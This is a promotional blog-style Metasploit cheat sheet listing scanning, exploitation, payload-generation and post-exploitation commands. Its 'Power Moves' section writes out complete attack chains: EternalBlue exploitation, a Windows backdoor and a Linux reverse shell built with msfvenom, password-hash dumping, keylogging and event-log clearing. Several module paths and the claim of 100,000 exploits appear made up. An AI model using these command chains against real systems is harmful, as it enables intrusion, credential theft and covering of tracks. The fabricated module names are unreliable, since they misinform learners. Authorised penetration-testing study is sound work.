Master Metasploit in 2025: Top 100 Commands Every Hacker Needs – With Bonus Penetration Testing Cheat Sheet

Metasploit is the ultimate penetration testing tool dominating cybersecurity in 2025. With a massive library of real-world exploits and seamless integration, it’s a must-have for hackers, red teamers, and security pros. This article delivers 100 essential Metasploit commands, paired with a bonus cheat sheet to supercharge your hacking skills.

Why Metasploit Rules in 2025

Metasploit, built by Rapid7, excels at simulating attacks with over 100,000 community-driven exploits. Its versatility—spanning scanning, exploitation, and post-exploitation—makes it indispensable for ethical hackers and penetration testers staying ahead in 2025.

Basic Scanning

| Command | Description |
| --- | --- |
| msfconsole | Launch the Metasploit console |
| help | Display all available commands |
| search | Search for modules (e.g., search eternalblue) |
| use | Select a module (e.g., use 2) |
| options | View module options |
| set RHOSTS | Set target IP (e.g., set RHOSTS 192.168.1.1) |
| set RPORT | Set target port (e.g., set RPORT 445) |
| set LHOST | Set local host IP |
| set LPORT | Set local port (e.g., set LPORT 4444) |
| show options | Display current options |
| show modules | List all modules |
| show exploits | List exploit modules |
| show auxiliary | List auxiliary modules |
| show payloads | List payloads |
| back | Exit module to main console |
| info | Show module details |
| check | Check target vulnerability |
| connect | Open TCP connection to target |
| sessions | List active sessions |
| sessions -i | Interact with session ID |

Advanced Scanning

| Command | Description |
| --- | --- |
| use auxiliary/scanner/portscan/tcp | TCP port scanner |
| set THREADS | Set threads (e.g., set THREADS 50) |
| run | Execute module |
| use auxiliary/scanner/http/http_version | Enumerate HTTP versions |
| set TARGETURI | Set URI (e.g., set TARGETURI /) |
| use auxiliary/scanner/smb/smb_version | Scan SMB version |
| use auxiliary/scanner/ssh/ssh_login | Attempt SSH login |
| set USERNAME | Set username (e.g., set USERNAME admin) |
| set PASSWORD | Set password |
| use auxiliary/scanner/ftp/ftp_login | Attempt FTP login |
| use auxiliary/scanner/telnet/telnet_login | Attempt Telnet login |
| set VERBOSE | Enable verbose output |
| use auxiliary/scanner/nmap/nmap | Integrate Nmap |
| set NMAP_OPTIONS | Set Nmap options (e.g., -sV) |
| use auxiliary/server/capture/http | HTTP capture server |
| use auxiliary/server/capture/smtp | SMTP capture server |
| use auxiliary/gather/service_enum | Enumerate services |
| set TIMEOUT | Set timeout (e.g., set TIMEOUT 30) |
| use auxiliary/scanner/dns/dns_brute_force | DNS brute force |
| use auxiliary/scanner/rdp/rdp_scanner | Scan RDP services |

Exploitation

| Command | Description |
| --- | --- |
| use exploit/windows/smb/ms17_010_eternalblue | EternalBlue exploit |
| set PAYLOAD | Set payload (e.g., windows/meterpreter/reverse_tcp) |
| exploit | Launch exploit |
| show targets | List exploit targets |
| set TARGET | Set target ID (e.g., set TARGET 0) |
| use exploit/multi/http/tomcat_mgr_upload | Tomcat manager exploit |
| set URI | Set URI (e.g., set URI /manager/html) |
| use exploit/linux/ssh/sshd_realtek_wps | SSH exploit |
| set USERPASS_FILE | Set credential file |
| use exploit/windows/ftp/proftpd_133c_backdoor | ProFTPD backdoor exploit |
| set BADCHARS | Avoid chars (e.g., set BADCHARS "\x00") |
| use exploit/multi/browser/adobe_flash_hacking_team_uaf | Flash exploit |
| set ENCODING | Set payload encoding |
| use exploit/windows/local/bypassuac | Bypass UAC |
| set SESSION | Set session ID (e.g., set SESSION 1) |
| use exploit/linux/local/privilege_escalation | Privilege escalation |
| set FORCE_EXPLOIT | Force exploit execution |
| use exploit/multi/elasticsearch/search_grok_payload_exec | Elasticsearch exploit |
| set PROXY | Set proxy |
| use exploit/windows/http/iis_webdav_scstoragepathfromurl | IIS WebDAV exploit |

Payloads

| Command | Description |
| --- | --- |
| msfvenom -p windows/meterpreter/reverse_tcp | Windows Meterpreter payload |
| msfvenom -l payloads | List payloads |
| msfvenom -f exe | Output as executable |
| msfvenom -e x86/shikata_ga_nai | Encode with Shikata Ga Nai |
| msfvenom -a x86 | Set architecture (e.g., x86) |
| msfvenom -b "\x00" | Avoid null bytes |
| msfvenom -i 3 | Encode 3 times |
| msfvenom -x template.exe | Use template file |
| msfvenom -o output.exe | Save to file |
| msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 | Linux reverse shell |
| msfvenom -p java/meterpreter/reverse_tcp -f jar | Java Meterpreter JAR |
| msfvenom -p php/meterpreter/reverse_tcp -f raw | PHP Meterpreter |
| msfvenom -p python/meterpreter/reverse_tcp -f py | Python Meterpreter |
| msfvenom -p windows/x64/meterpreter/reverse_tcp -f dll | Windows x64 DLL |
| msfvenom -h | Show msfvenom help |

Post-Exploitation

| Command | Description |
| --- | --- |
| sysinfo | Show target system info |
| ps | List processes |
| kill | Kill process (e.g., kill 1234) |
| getuid | Show user ID |
| upload | Upload file (e.g., upload file.txt /tmp) |
| download | Download file (e.g., download /tmp/file.txt .) |
| pwd | Show current directory |
| cd | Change directory (e.g., cd /tmp) |
| cat | View file (e.g., cat /etc/passwd) |
| shell | Access shell |
| migrate | Switch process (e.g., migrate 1234) |
| hashdump | Dump hashes |
| keyscan_start | Start keylogger |
| keyscan_dump | Dump keystrokes |
| clearev | Clear event logs |

Integration

| Command | Description |
| --- | --- |
| msfdb init | Initialize database |
| load nmap | Load Nmap extension |
| db_nmap -sV -A | Nmap scan to database |
| db_import | Import scan results |
| hosts | List database hosts |
| services | List services |
| vulns | List vulnerabilities |
| db_export -f xml | Export to XML |
| use auxiliary/admin/scanner/nessus/nessus_login | Nessus login scanner |
| set NESSUS_HOST | Set Nessus host (e.g., set NESSUS_HOST 192.168.1.1) |

Real-World Power Moves

  • Network Scan: use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run – Scan subnet for open ports.
  • HTTP Version Check: use auxiliary/scanner/http/http_version; set RHOSTS 10.0.0.1; run – Identify web server versions.
  • SMB Recon: use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.10; run – Detect SMB versions.
  • SSH Login Test: use auxiliary/scanner/ssh/ssh_login; set RHOSTS 10.0.0.2; set USERNAME admin; set PASSWORD pass; run – Test SSH credentials.
  • EternalBlue Exploit: use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set PAYLOAD windows/meterpreter/reverse_tcp; exploit – Exploit Windows SMB.
  • Tomcat Attack: use exploit/multi/http/tomcat_mgr_upload; set RHOSTS 10.0.0.3; set URI /manager/html; exploit – Deploy payload via Tomcat.
  • Payload Generation: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o backdoor.exe – Create Windows backdoor.
  • Linux Shell: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf – Generate Linux reverse shell.
  • System Info: sessions -i 1; sysinfo – Get target system details.
  • Process List: sessions -i 1; ps – View running processes.
  • File Upload: sessions -i 1; upload /local/file.txt /remote/path – Transfer file to target.
  • Hash Dump: sessions -i 1; hashdump – Extract password hashes.
  • Keylogging: sessions -i 1; keyscan_start; keyscan_dump – Capture keystrokes.
  • Nmap Integration: load nmap; db_nmap -sV -A 192.168.1.0/24 – Scan and store results.
  • Database Export: db_export -f xml results.xml – Save scan data to XML.

Bonus Penetration Testing Cheat Sheet

Boost your Metasploit skills with these tools:

  • Burp Suite: Web app testing.
  • Nessus: Vulnerability scanning.
  • Wireshark: Packet analysis.
    Find more at SquidHacker.com.

Pro Tips for Metasploit Masters

  • Stay Updated: Run msfupdate weekly.
  • Verify Exploits: Cross-check results to avoid false positives.
  • Integrate: Pair with Nmap or Nessus for deeper scans.
  • Stay Legal: Test only authorized targets.
  • Tune Scans: Adjust THREADS for speed.

Conclusion

Metasploit’s 100 commands give you the edge in penetration testing for 2025. From scanning to exploitation, this guide equips you to dominate security assessments. Use it ethically, keep learning, and follow SquidHacker.com for more hardcore cybersecurity intel. Share this cheat sheet and own the hacking game!